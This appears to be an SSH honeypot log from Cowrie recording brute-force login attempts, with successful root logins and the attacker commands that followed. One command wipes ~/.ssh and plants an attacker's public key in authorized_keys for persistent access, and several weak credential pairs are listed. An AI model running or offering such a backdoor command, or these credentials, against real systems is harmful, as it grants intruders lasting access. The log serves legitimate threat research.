{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:52.584725Z","src_ip":"212.227.235.229","session":"bf67297fda99"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:53.330097Z","src_ip":"212.227.235.229","session":"bf67297fda99"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:54.580079Z","src_ip":"212.227.235.229","session":"bf67297fda99"}
{"eventid":"cowrie.session.closed","duration":30.866174459457397,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:56.512708Z","src_ip":"8.222.212.69","session":"a424beae1144"}
{"eventid":"cowrie.session.closed","duration":31.269118547439575,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:58.269007Z","src_ip":"8.222.212.69","session":"f642d5a778f1"}
{"eventid":"cowrie.session.connect","src_ip":"95.223.129.254","src_port":62729,"dst_ip":"1.2.3.4","dst_port":22,"session":"33a6ac4c4c6c","protocol":"ssh","message":"New connection: 95.223.129.254:62729 (1.2.3.4:22) [session: 33a6ac4c4c6c]","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.015589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.016471Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.045533Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.login.success","username":"root","password":"4rfvVFR$","message":"login attempt [root/4rfvVFR$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.184294Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:19:01.345775Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.346443Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.347652Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.370990Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:19:01.441581Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.442336Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.467860Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.468719Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.session.connect","src_ip":"95.223.129.254","src_port":59385,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0749819a076","protocol":"ssh","message":"New connection: 95.223.129.254:59385 (1.2.3.4:22) [session: e0749819a076]","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.501975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.503142Z","src_ip":"95.223.129.254","session":"e0749819a076"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.523510Z","src_ip":"95.223.129.254","session":"e0749819a076"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.658886Z","src_ip":"95.223.129.254","session":"e0749819a076"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38222,"dst_ip":"1.2.3.4","dst_port":22,"session":"8df505bd31da","protocol":"ssh","message":"New connection: 212.227.235.229:38222 (1.2.3.4:22) [session: 8df505bd31da]","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.906543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:01.907454Z","src_ip":"212.227.235.229","session":"8df505bd31da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58596,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aa70417f730","protocol":"ssh","message":"New connection: 212.227.125.160:58596 (1.2.3.4:22) [session: 9aa70417f730]","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.053086Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.054132Z","src_ip":"212.227.235.229","session":"8df505bd31da"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.074526Z","src_ip":"212.227.125.160","session":"9aa70417f730"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.271305Z","src_ip":"212.227.125.160","session":"9aa70417f730"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.496517Z","src_ip":"212.227.235.229","session":"8df505bd31da"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.684698Z","src_ip":"95.223.129.254","session":"e0749819a076"}
{"eventid":"cowrie.session.connect","src_ip":"95.223.129.254","src_port":61008,"dst_ip":"1.2.3.4","dst_port":22,"session":"81a6589eb9df","protocol":"ssh","message":"New connection: 95.223.129.254:61008 (1.2.3.4:22) [session: 81a6589eb9df]","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.714522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.718608Z","src_ip":"95.223.129.254","session":"81a6589eb9df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.744718Z","src_ip":"95.223.129.254","session":"81a6589eb9df"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.884784Z","src_ip":"95.223.129.254","session":"81a6589eb9df"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.914958Z","src_ip":"95.223.129.254","session":"81a6589eb9df"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:02.919026Z","src_ip":"95.223.129.254","session":"33a6ac4c4c6c"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:03.132533Z","src_ip":"212.227.125.160","session":"9aa70417f730"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:03.643307Z","src_ip":"212.227.235.229","session":"8df505bd31da"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:04.349607Z","src_ip":"212.227.125.160","session":"9aa70417f730"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40718,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ae0905d0526","protocol":"ssh","message":"New connection: 212.227.125.160:40718 (1.2.3.4:22) [session: 0ae0905d0526]","sensor":"my-vps","timestamp":"2025-08-28T06:19:07.055569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:07.056539Z","src_ip":"212.227.125.160","session":"0ae0905d0526"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:07.161352Z","src_ip":"212.227.125.160","session":"0ae0905d0526"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:07.478302Z","src_ip":"212.227.125.160","session":"0ae0905d0526"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:08.586175Z","src_ip":"212.227.125.160","session":"0ae0905d0526"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60380,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2d118e629dd","protocol":"ssh","message":"New connection: 212.227.235.229:60380 (1.2.3.4:22) [session: a2d118e629dd]","sensor":"my-vps","timestamp":"2025-08-28T06:19:08.671140Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:08.672142Z","src_ip":"212.227.235.229","session":"a2d118e629dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:19:08.922049Z","src_ip":"212.227.235.229","session":"a2d118e629dd"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T06:19:09.674950Z","src_ip":"212.227.235.229","session":"a2d118e629dd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:19:10.928519Z","src_ip":"212.227.235.229","session":"a2d118e629dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49118,"dst_ip":"1.2.3.4","dst_port":22,"session":"000b3c01d69d","protocol":"ssh","message":"New connection: 212.227.125.160:49118 (1.2.3.4:22) [session: 000b3c01d69d]","sensor":"my-vps","timestamp":"2025-08-28T06:19:18.447549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:19:18.448541Z","src_ip":"212.227.125.160","session":"000b3c01d69d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa